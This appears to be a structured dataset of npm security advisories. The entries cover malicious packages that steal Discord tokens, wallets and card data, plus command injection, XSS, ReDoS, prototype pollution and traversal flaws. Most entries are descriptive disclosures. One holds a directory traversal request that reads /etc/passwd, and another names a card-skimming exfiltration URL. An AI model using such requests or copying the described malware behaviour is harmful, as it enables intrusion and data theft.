ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
npm
GHSA-qj2g-642f-4jrv
Malicious Package in carloprojectlesang
All versions of `carloprojectlesang` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts. ## Recommendation Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.
null
2021-09-30T21:15:22Z
2020-09-02T21:17:30Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/872'}
null
npm
GHSA-xmmp-hrmx-x5g7
Malicious Package in bowe
Version 1.8.4 of `bowee` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T21:37:37Z
2020-09-02T21:32:22Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/899'}
null
npm
GHSA-4gfq-6m28-m5mg
Improper neutralization of arguments in freediskspace
This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js.
{'CVE-2020-7775'}
2021-03-19T23:11:49Z
2021-04-13T15:16:11Z
CRITICAL
null
{'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7775', 'https://snyk.io/vuln/SNYK-JS-FREEDISKSPACE-1040716'}
null
npm
GHSA-j6v9-xgvh-f796
Command Injection in wxchangba
All versions of `wxchangba` are vulnerable to Command Injection. The package does not validate user input on the `reqPostMaterial` function, passing contents of the `file` parameter to an exec call. This may allow attackers to run arbitrary commands in the system. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
null
2020-08-31T18:42:04Z
2020-09-11T21:11:34Z
MODERATE
null
{'CWE-77'}
{'https://www.npmjs.com/advisories/960'}
null
npm
GHSA-jfx5-7mr2-g8hg
Malicious Package in alico
All versions of `alico` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T18:35:26Z
2020-09-03T17:31:41Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1047'}
null
npm
GHSA-2q4g-w47c-4674
Unpreventable top-level navigation
### Impact The `will-navigate` event that apps use to prevent navigations to unexpected destinations [as per our security recommendations](https://www.electronjs.org/docs/tutorial/security) can be bypassed when a sub-frame performs a top-frame navigation across sites. ### Patches * `11.0.0-beta.1` * `10.0.1` * `9.3.0` * `8.5.1` ### Workarounds Sandbox all your iframes using the [`sandbox` attribute](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox). This will prevent them creating top-frame navigations and is good practice anyway. ### For more information If you have any questions or comments about this advisory: * Email us at security@electronjs.org
{'CVE-2020-15174'}
2021-11-19T14:44:04Z
2020-10-06T14:24:04Z
HIGH
null
{'CWE-20', 'CWE-693'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15174', 'https://github.com/electron/electron', 'https://github.com/electron/electron/security/advisories/GHSA-2q4g-w47c-4674', 'https://github.com/electron/electron/commit/18613925610ba319da7f497b6deed85ad712c59b'}
null
npm
GHSA-gwg9-rgvj-4h5j
Code Injection in morgan
Verisons of `morgan` before 1.9.1 are vulnerable to code injection when user input is allowed into the filter or combined with a prototype pollution attack. ## Recommendation Update to version 1.9.1 or later.
{'CVE-2019-5413'}
2020-08-31T18:33:56Z
2019-03-25T18:03:23Z
MODERATE
null
{'CWE-94'}
{'https://github.com/nodejs/security-wg/blob/master/vuln/npm/473.json', 'https://www.npmjs.com/advisories/736', 'https://lists.apache.org/thread.html/r8ba4c628fba7181af58817d452119481adce4ba92e889c643e4c7dd3@%3Ccommits.netbeans.apache.org%3E', 'https://lists.apache.org/thread.html/rb5ac16fad337d1f3bb7079549f97d8166d0ef3082629417c39f12d63@%3Cnotifications.netbeans.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5413', 'https://github.com/advisories/GHSA-gwg9-rgvj-4h5j', 'https://hackerone.com/reports/390881'}
null
npm
GHSA-3cqr-58rm-57f8
Arbitrary Code Execution in Handlebars
Handlebars before 3.0.8 and 4.x before 4.5.3 is vulnerable to Arbitrary Code Execution. The lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript. This can be used to run arbitrary code on a server processing Handlebars templates or in a victim's browser (effectively serving as XSS).
{'CVE-2019-20920'}
2021-04-22T23:38:32Z
2022-02-10T20:38:19Z
HIGH
null
{'CWE-94'}
{'https://github.com/handlebars-lang/handlebars.js/commit/d54137810a49939fd2ad01a91a34e182ece4528e', 'https://www.npmjs.com/advisories/1316', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20920', 'https://www.npmjs.com/advisories/1324', 'https://www.npmjs.com/package/handlebars', 'https://snyk.io/vuln/SNYK-JS-HANDLEBARS-534478'}
null
npm
GHSA-cg57-p69r-3m7p
Improper file handling in matrix-react-sdk
Matrix-React-SDK is a react-based SDK for inserting a Matrix chat/voip client into a web page. Before version 3.21.0, when uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file. This can only occur after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other users. This vulnerability is patched in version 3.21.0.
{'CVE-2021-32622'}
2021-05-19T17:48:44Z
2022-02-10T23:46:51Z
MODERATE
null
{'CWE-74', 'CWE-434'}
{'https://www.npmjs.com/package/matrix-react-sdk', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32622', 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-8796-gc9j-63rv', 'https://github.com/matrix-org/matrix-react-sdk/pull/5981'}
null
npm
GHSA-2xm2-xj2q-qgpj
receiving subscription objects with deleted session
Original Message: Hi, I create objects with one client with an ACL of all users with a specific column value. Thats working so far. Then I deleted the session object from one user to look if he can receive subscription objects and he can receive them. The client with the deleted session cant create new objects, which Parse restricts right. The LiveQueryServer doesnt detect deleted sessions after the websocket connection was established. There should be a mechanism that checks in an specific interval if the session exists. I dont know if its true with expired sessions. Any solutions? Parse version: 4.3.0 Parse js SDK version: 2.17 Solution: Hi guys. I've found and fixed the problem. It happens because there are two caches in place for the session token: - at Parse Server level, which, according with the docs, should be changed via cacheTTL option and defaults to 5 seconds; - at Parse Live Query level, which, according with the docs, should be changed via liveQueryServerOptions.cacheTimeout and defaults to 30 days. But there are three problems: - cacheTTL has currently no effect over Live Query Server; - cacheTimeout also has currently no effect over Live Query Server; - cacheTimeout actually defaults to 1h. So, currently, if you wait 1 hour after the session token was invalidated, the clients using the old session token are not able to receive the events. What I did: - Added a test case for the problem; - Fixed cacheTTL for Live Query Server; - Fixed cacheTimeout for Live Query Server; - Changed the cacheTimeout to default 5s; - Changed the docs to reflect the actual 5s default for cacheTimeout.
{'CVE-2020-15270'}
2021-10-06T22:02:05Z
2020-10-27T19:15:19Z
MODERATE
null
{'CWE-672'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15270', 'https://github.com/parse-community/parse-server/commit/78b59fb26b1c36e3cdbd42ba9fec025003267f58', 'https://github.com/parse-community/parse-server/security/advisories/GHSA-2xm2-xj2q-qgpj', 'https://github.com/parse-community/parse-server'}
null
npm
GHSA-3mgp-fx93-9xv5
XSS vulnerability that affects bootstrap
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.
{'CVE-2018-20676'}
2021-07-26T21:50:29Z
2019-01-17T13:57:34Z
MODERATE
null
{'CWE-79'}
{'https://github.com/twbs/bootstrap/issues/27915#issuecomment-452140906', 'https://github.com/advisories/GHSA-3mgp-fx93-9xv5', 'https://access.redhat.com/errata/RHSA-2020:0133', 'https://github.com/twbs/bootstrap/pull/27047', 'https://access.redhat.com/errata/RHSA-2020:0132', 'https://access.redhat.com/errata/RHBA-2019:1570', 'https://nvd.nist.gov/vuln/detail/CVE-2018-20676', 'https://blog.getbootstrap.com/2018/12/13/bootstrap-3-4-0/', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://access.redhat.com/errata/RHBA-2019:1076', 'https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628', 'https://access.redhat.com/errata/RHSA-2019:3023', 'https://github.com/twbs/bootstrap/issues/27044', 'https://access.redhat.com/errata/RHSA-2019:1456'}
null
npm
GHSA-77g4-36jp-5v3m
Remote Memory Disclosure in bittorrent-dht
Versions of `bittorrent-dht` prior to 5.1.3 are affected by a remote memory disclosure vulnerability. This vulnerability allows an attacker to send a specific series of of messages to a listening peer and get it to reveal internal memory. There are two mitigating factors here, that slightly reduce the impact of this vulnerability: 1. Any modern kernel will zero out new memory pages before handing them off to a process. This means that only memory previously used and deallocated by the node process can be leaked. 1. Node.js manages Buffers by creating a few large internal SlowBuffers, and slicing them up into smaller Buffers which are made accessible in JS. They are not stored on V8's heap, because garbage collection would interfere. The result is that only memory that has been previously allocated as a Buffer can be leaked. ## Recommendation Update to version 5.1.3 or later.
{'CVE-2016-10519'}
2020-08-31T18:09:58Z
2020-09-01T15:22:12Z
MODERATE
null
{'CWE-201'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10519', 'https://github.com/feross/bittorrent-dht/issues/87', 'https://nodesecurity.io/advisories/68', 'https://www.npmjs.com/advisories/68'}
null
npm
GHSA-6jqp-j69q-pm62
AWS Lambda parser is vulnerable to Regular Expression Denial of Service
index.js in the aws-lambda-multipart-parser NPM package before 0.1.2 has a Regular Expression Denial of Service (ReDoS) issue via a crafted multipart/form-data boundary string.
{'CVE-2018-7560'}
2022-04-25T22:28:16Z
2018-03-05T19:16:56Z
HIGH
null
{'CWE-20'}
{'https://github.com/myshenin/aws-lambda-multipart-parser', 'https://nvd.nist.gov/vuln/detail/CVE-2018-7560', 'https://github.com/advisories/GHSA-6jqp-j69q-pm62', 'https://github.com/myshenin/aws-lambda-multipart-parser/commit/56ccb03af4dddebc2b2defb348b6558783d5757e'}
null
npm
GHSA-7vm7-j8p7-h346
Code injection in blamer
Code injection vulnerability in blamer 1.0.0 and earlier may result in remote code execution when the input can be controlled by an attacker.
{'CVE-2020-8137'}
2021-05-04T22:31:46Z
2021-05-06T18:27:55Z
HIGH
null
{'CWE-94'}
{'https://hackerone.com/reports/772448', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8137'}
null
npm
GHSA-g8m7-qhv7-9h5x
Path Traversal in serve-here.js
Versions of `serve-here.js` prior to 1.2.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths. ## Recommendation Upgrade to version 1.2.0 or later.
null
2021-09-22T18:35:22Z
2019-07-05T21:07:14Z
HIGH
null
{'CWE-22'}
{'https://hackerone.com/reports/569966', 'https://github.com/vivaxy/here/commit/298dbab41344dfb7f95f66b1fa7b5cfb436bd4a2', 'https://nodesecurity.io/advisories/554', 'https://hackerone.com/reports/296254', 'https://github.com/vivaxy/here/pull/17', 'https://www.npmjs.com/advisories/554'}
null
npm
GHSA-3h99-v4qw-p2h5
Malicious Package in coinpayment
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:57:40Z
2020-09-03T19:41:56Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1382'}
null
npm
GHSA-f8rq-m28h-8hxj
Cross-Site Scripting in htmr
Versions of `htmr` prior to 0.8.7 are vulnerable to Cross-Site Scripting (XSS). The package uses `innerHTML` to unescape HTML entities. This may lead to [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS) through HTML-encoded XSS payloads. This may allow an attacker to execute arbitrary JavaScript in a victim's browser. ## Recommendation Upgrade to version 0.8.7 or later.
null
2020-08-31T19:01:22Z
2020-09-03T15:50:29Z
HIGH
null
{'CWE-79'}
{'https://hackerone.com/reports/753971', 'https://www.npmjs.com/advisories/1496'}
null
npm
GHSA-76qm-4f93-fg6f
Improper Input Validation in xdLocalStorage
An issue was discovered in xdLocalStorage through 2.0.5. The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin of web messages. Remote attackers who can entice a user to load a malicious site can exploit this issue to impact the confidentiality and integrity of data in the local storage of the vulnerable site via malicious web messages.
{'CVE-2015-9545'}
2021-05-25T16:14:14Z
2021-12-09T19:30:29Z
MODERATE
null
{'CWE-20'}
{'https://grimhacker.com/exploiting-xdlocalstorage-localstorage-and-postmessage/#Missing-Origin-Client', 'https://github.com/ofirdagan/cross-domain-local-storage/issues/17', 'https://nvd.nist.gov/vuln/detail/CVE-2015-9545', 'https://github.com/ofirdagan/cross-domain-local-storage', 'https://github.com/ofirdagan/cross-domain-local-storage/pull/19'}
null
npm
GHSA-vhx6-cp8w-295m
Directory Traversal in serverliujiayi1
Affected versions of `serverliujiayi1` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16095'}
2020-08-31T18:20:39Z
2020-09-01T16:55:45Z
HIGH
null
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16095', 'https://www.npmjs.com/advisories/367', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverliujiayi1', 'https://nodesecurity.io/advisories/367'}
null
npm
GHSA-f523-2f5j-gfcg
Regular Expression Denial of Service in timespan
Affected versions of `timespan` are vulnerable to a regular expression denial of service when parsing dates. The amplification for this vulnerability is significant, with 50,000 characters resulting in the event loop being blocked for around 10 seconds. ## Recommendation No direct patch is available for this vulnerability. Currently, the best available solution is to use a functionally equivalent alternative package. It is also sufficient to ensure that user input is not being passed into `timespan`, or that the maximum length of such user input is drastically reduced. Limiting the input length to 150 characters should be sufficient in most cases.
{'CVE-2017-16115'}
2020-08-31T18:26:44Z
2018-08-29T23:04:14Z
LOW
null
{'CWE-400'}
{'https://nodesecurity.io/advisories/533', 'https://github.com/indexzero/TimeSpan.js/issues/10', 'https://github.com/advisories/GHSA-f523-2f5j-gfcg', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16115', 'https://www.npmjs.com/advisories/533'}
null
npm
GHSA-j977-g5vj-j27g
Cross-Site Scripting in scratch-svg-renderer
This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.
{'CVE-2020-7750'}
2021-01-07T22:49:01Z
2020-11-09T14:21:17Z
HIGH
null
{'CWE-79'}
{'https://github.com/LLK/scratch-svg-renderer/commit/9ebf57588aa596c4fa3bb64209e10ade395aee90', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7750', 'https://snyk.io/vuln/SNYK-JS-SCRATCHSVGRENDERER-1020497'}
null
npm
GHSA-pm9p-9926-w68m
Denial of Service in ecstatic
`ecstatic`, a simple static file server middleware, is vulnerable to denial of service. If a payload with a large number of null bytes (`%00`) is provided by an attacker it can crash ecstatic by running it out of memory. [Results from the original advisory](https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/) ``` A payload of 22kB caused a lag of 1 second, A payload of 35kB caused a lag of 3 seconds, A payload of 86kB caused the server to crash ``` ## Recommendation Update to version 2.0.0 or later.
{'CVE-2016-10703'}
2021-09-16T18:15:09Z
2017-12-28T22:52:47Z
HIGH
null
{'CWE-20'}
{'https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/', 'https://advisory.checkmarx.net/advisory/CX-2016-4450', 'https://github.com/jfhbrook/node-ecstatic', 'https://github.com/jfhbrook/node-ecstatic/commit/71ce93988ead4b561a8592168c72143907189f01#diff-b2b5a88fb51675f1aa1065c093dce1ee', 'https://github.com/advisories/GHSA-pm9p-9926-w68m', 'https://www.npmjs.com/advisories/553', 'https://github.com/jfhbrook/node-ecstatic/commit/71ce93988ead4b561a8592168c72143907189f01', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10703'}
null
npm
GHSA-2vqq-jgxx-fxjc
Malicious Package in motiv.scss
Version 0.4.20 of `motiv.scss` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=` ## Recommendation Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
null
2021-09-30T22:07:26Z
2020-09-11T21:24:33Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/939'}
null
npm
GHSA-73jp-3c67-hjfv
Authentication Bypass in passport-azure-ad
Affected versions of `passport-azure-ad` do not recognize the `validateIssuer` setting, which allows remote attackers to bypass authentication via a crafted token. ## Recommendation Version 1.x: Update to version 1.4.6 or later. Version 2.x: Update to version 2.0.1 or later.
{'CVE-2016-7191'}
2021-09-02T19:18:46Z
2018-07-26T15:53:31Z
HIGH
null
{'CWE-287'}
{'https://support.microsoft.com/en-us/kb/3187742', 'http://www.securitytracker.com/id/1036996', 'http://www.securityfocus.com/bid/93213', 'https://support.microsoft.com/kb/3187742', 'https://nvd.nist.gov/vuln/detail/CVE-2016-7191', 'https://github.com/advisories/GHSA-73jp-3c67-hjfv', 'https://www.npmjs.com/advisories/151', 'https://github.com/AzureAD/passport-azure-ad', 'https://github.com/AzureAD/passport-azure-ad/blob/master/SECURITY-NOTICE.MD'}
null
npm
GHSA-vwrf-r5r4-7775
Incorrect handling of CORS preflight request headers in hapi
Versions of `hapi` prior to 11.0.0 implement CORS incorrectly, allowing for configurations that at best return inconsistent headers, and at worst allow cross-origin activities that are expected to be forbidden. If the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route. ## Recommendation Update to version 11.0.0 or later.
{'CVE-2015-9236'}
2020-08-31T18:09:06Z
2018-06-07T19:43:25Z
MODERATE
null
{'CWE-284'}
{'https://nodesecurity.io/advisories/45', 'https://github.com/advisories/GHSA-vwrf-r5r4-7775', 'https://github.com/hapijs/hapi/issues/2840', 'https://www.npmjs.com/advisories/45', 'https://github.com/hapijs/hapi/issues/2850', 'https://nvd.nist.gov/vuln/detail/CVE-2015-9236'}
null
npm
GHSA-xgh6-85xh-479p
Regular Expression Denial of Service in npm-user-validate
`npm-user-validate` before version `1.0.1` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with `@` characters. ### Impact The issue affects the `email` function. If you use this function to process arbitrary user input with no character limit the application may be susceptible to Denial of Service. ### Patches The issue is patched in version 1.0.1 by improving the regular expression used and also enforcing a 254 character limit. ### Workarounds Restrict the character length to a reasonable degree before passing a value to `.emal()`; Also, consider doing a more rigorous sanitizing/validation beforehand.
null
2020-10-16T18:56:02Z
2020-10-16T18:56:26Z
LOW
null
null
{'https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p'}
null
npm
GHSA-38vq-cjh5-vw7x
Malicious Package in nodes.js
All versions of `nodes.js ` contain malicious code. The package searches and installs globally thousands of packages based on keywords `node`, `react`, `react-native`, `vue`, `angular` and `babel` to fill the system's memory. ## Recommendation Remove the package from your environment and validate what packages are installed.
null
2021-09-30T20:04:09Z
2020-09-03T18:13:41Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1074'}
null
npm
GHSA-gjhx-gxwx-jx9j
Cross-Site Scripting in jqtree
Affected versions of `jqtree` are vulnerable to cross-site scripting in the drag and drop functionality for modifying tree data. When a user attempts to drag a node to a different position in the hierarchy, script content existing within the node will be executed. ## Recommendation Update to 1.3.4 or later.
{'CVE-2016-1000234'}
2021-09-23T21:33:49Z
2020-09-01T15:35:22Z
HIGH
null
{'CWE-79'}
{'https://github.com/mbraak/jqTree', 'https://github.com/mbraak/jqTree/issues/437', 'https://www.npmjs.com/advisories/132', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000234'}
null
npm
GHSA-jxwx-85vp-gvwm
Regular Expression Denial of Service in jquery-validation
The GitHub Security Lab team has identified potential security vulnerabilities in jquery.validation. The project contains one or more regular expressions that are vulnerable to ReDoS (Regular Expression Denial of Service) This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).
{'CVE-2021-21252'}
2021-01-13T18:21:42Z
2021-01-13T18:21:54Z
MODERATE
null
{'CWE-400'}
{'https://www.npmjs.com/package/jquery-validation', 'https://github.com/jquery-validation/jquery-validation/commit/5d8f29eef363d043a8fec4eb86d42cadb5fa5f7d', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21252', 'https://github.com/jquery-validation/jquery-validation/security/advisories/GHSA-jxwx-85vp-gvwm', 'https://github.com/jquery-validation/jquery-validation/pull/2371', 'https://security.netapp.com/advisory/ntap-20210219-0005/'}
null
npm
GHSA-w2pf-g6r8-pg22
Placeholder property does not indicate HTML capable, could lead to inadvertent abuse
## Overview Auth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages. ## Am I affected? You are affected by this vulnerability if all of the following conditions apply: - You are using Auth0 Lock version 11.20.4 or earlier. - You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source. An example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter: ```javascript <script> var params = new URLSearchParams(window.location.search); var options = { auth: { redirectUrl: 'http://localhost:12345/callback', responseType: 'code', params: { scope: 'openid email', }, }, additionalSignUpFields: [{ name: 'agree', type: 'checkbox', placeholder: "I agree to Terms and Conditions for " + params.get('name'), }], }; var lock = new Auth0Lock('<CLIENT_ID>', '<TENANT_NAME>.auth0.com', options); lock.show({ allowShowPassword: true, initialScreen: 'signUp', }); </script> ``` ## How to fix that? Developers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes: 1. The existing `placeholder` property is now treated as plain text to mitigate the problem. 2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources. ## Will this update impact my users? This fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions. Developers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience.
{'CVE-2019-20174'}
2021-08-19T16:48:59Z
2020-01-31T17:59:51Z
MODERATE
null
{'CWE-79'}
{'https://github.com/auth0/lock/commit/6c15e5659c21cd814ea119af5c51b61399598dd5', 'https://github.com/auth0/lock/releases/tag/v11.21.0', 'https://auth0.com/docs/security/bulletins/cve-2019-20174', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20174', 'https://github.com/auth0/lock/security/advisories/GHSA-w2pf-g6r8-pg22'}
null
npm
GHSA-cg48-9hh2-x6mx
HTML Injection in preact
Versions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization. ## Recommendation Upgrade to version 10.0.0-beta.1.
null
2021-09-27T20:53:56Z
2020-09-02T18:28:58Z
MODERATE
null
{'CWE-74'}
{'https://github.com/developit/preact/pull/1528', 'https://medium.com/dailyjs/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1', 'https://www.npmjs.com/advisories/835', 'https://github.com/developit/preact', 'https://github.com/developit/preact/releases/tag/10.0.0-beta.1'}
null
npm
GHSA-p72p-rjr2-r439
Server-Side Request Forgery in terriajs-server
Versions of `terriajs-server`prior to 2.7.4 are vulnerable to Server-Side Request Forgery (SSRF). If an attacker has access to a server whitelisted by the terriajs-server proxy or if the attacker is able to modify the DNS records of a domain whitelisted by the terriajs-server proxy, the attacker can use the terriajs-server proxy to access any HTTP-accessible resources that are accessible to the server, including private resources in the hosting environment. ## Recommendation Upgrade to version 2.7.4 or later.
null
2020-08-31T18:35:03Z
2019-05-29T20:24:02Z
HIGH
null
{'CWE-918'}
{'https://www.npmjs.com/advisories/768', 'https://medium.com/terria/security-vulnerability-in-terriajs-server-82c8bf4da0a5', 'https://github.com/TerriaJS/terriajs-server/commit/3cbc48475f50a53962f605491d0e60648a29bdf0'}
null
npm
GHSA-hwqf-gcqm-7353
Header injection in nodemailer
The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.
{'CVE-2021-23400'}
2021-06-30T17:38:02Z
2021-12-10T18:56:57Z
MODERATE
null
{'CWE-74'}
{'https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f', 'https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23400', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737', 'https://github.com/nodemailer/nodemailer/issues/1289'}
null
npm
GHSA-hx3r-jv9q-85jw
Bitcoin Inventory Out-of-Memory Denial-of-Service Attack (CVE-2018-17145)
There was an easily exploitable uncontrolled memory resource consumption denial-of-service vulnerability that existed in the peer-to-peer network code of three implementations of Bitcoin and several alternative chains. For more details please see: https://invdos.net/ For the paper: https://invdos.net/paper/CVE-2018-17145.pdf
{'CVE-2018-17145'}
2021-10-04T21:16:21Z
2020-09-10T19:44:58Z
HIGH
null
{'CWE-400'}
{'https://github.com/bitcoin/bitcoin/blob/v0.16.2/doc/release-notes.md', 'https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures#CVE-2018-17145', 'https://github.com/bcoin-org/bcoin/security/advisories/GHSA-hx3r-jv9q-85jw', 'https://invdos.net', 'https://invdos.net/paper/CVE-2018-17145.pdf', 'https://github.com/bcoin-org/bcoin', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17145'}
null
npm
GHSA-6xwr-q98w-rvg7
Prototype Pollution in nconf
nconf before 0.11.4. When using the memory engine, it is possible to store a nested JSON representation of the configuration. The .set() function, that is responsible for setting the configuration properties, is vulnerable to Prototype Pollution. By providing a crafted property, it is possible to modify the properties on the Object.prototype.
{'CVE-2022-21803'}
2022-04-22T20:32:05Z
2022-04-13T00:00:30Z
HIGH
null
{'CWE-1321'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21803', 'https://snyk.io/vuln/SNYK-JS-NCONF-2395478', 'https://github.com/indexzero/nconf', 'https://github.com/indexzero/nconf/pull/397', 'https://github.com/indexzero/nconf/releases/tag/v0.11.4'}
null
npm
GHSA-fvc6-qjp7-m4g4
Arbitrary file upload in Ghost
An arbitrary file upload vulnerability in the file upload module of Ghost v4.39.0 allows attackers to execute arbitrary code via a crafted SVG file.
{'CVE-2022-27139'}
2022-04-22T20:29:43Z
2022-04-13T00:00:24Z
CRITICAL
null
{'CWE-434'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-27139', 'https://github.com/TryGhost/Ghost', 'https://youtu.be/FCqWEvir2wE'}
null
npm
GHSA-r3j7-x2g5-9gx6
Command injection in samba-client
The samba-client package before 4.0.0 for Node.js allows command injection because of the use of process.exec.
{'CVE-2021-27185'}
2022-05-03T03:44:37Z
2021-02-11T20:47:27Z
CRITICAL
null
{'CWE-74', 'CWE-77', 'CWE-78'}
{'https://security.netapp.com/advisory/ntap-20210319-0002/', 'https://advisory.checkmarx.net/advisory/CX-2021-4302', 'https://github.com/eflexsystems/node-samba-client', 'https://www.npmjs.com/package/samba-client', 'https://github.com/eflexsystems/node-samba-client/commit/5bc3bbad9b8d02243bc861a11ec73f788fbb1235', 'https://github.com/eflexsystems/node-samba-client/releases/tag/4.0.0', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27185'}
null
npm
GHSA-3hw5-q855-g6cw
Prototype Pollution in Dojox
The Dojox jQuery wrapper `jqMix` mixin method is vulnerable to Prototype Pollution. Affected Area: ``` //https://github.com/dojo/dojox/blob/master/jq.js#L442 var tobj = {}; for(var x in props){ // the "tobj" condition avoid copying properties in "props" // inherited from Object.prototype. For example, if obj has a custom // toString() method, don't overwrite it with the toString() method // that props inherited from Object.prototype if((tobj[x] === undefined || tobj[x] != props[x]) && props[x] !== undefined && obj != props[x]){ if(dojo.isObject(obj[x]) && dojo.isObject(props[x])){ if(dojo.isArray(props[x])){ obj[x] = props[x]; }else{ obj[x] = jqMix(obj[x], props[x]); } }else{ obj[x] = props[x]; } ```
{'CVE-2020-5259'}
2021-02-18T19:45:35Z
2020-03-10T18:03:32Z
LOW
null
{'CWE-94'}
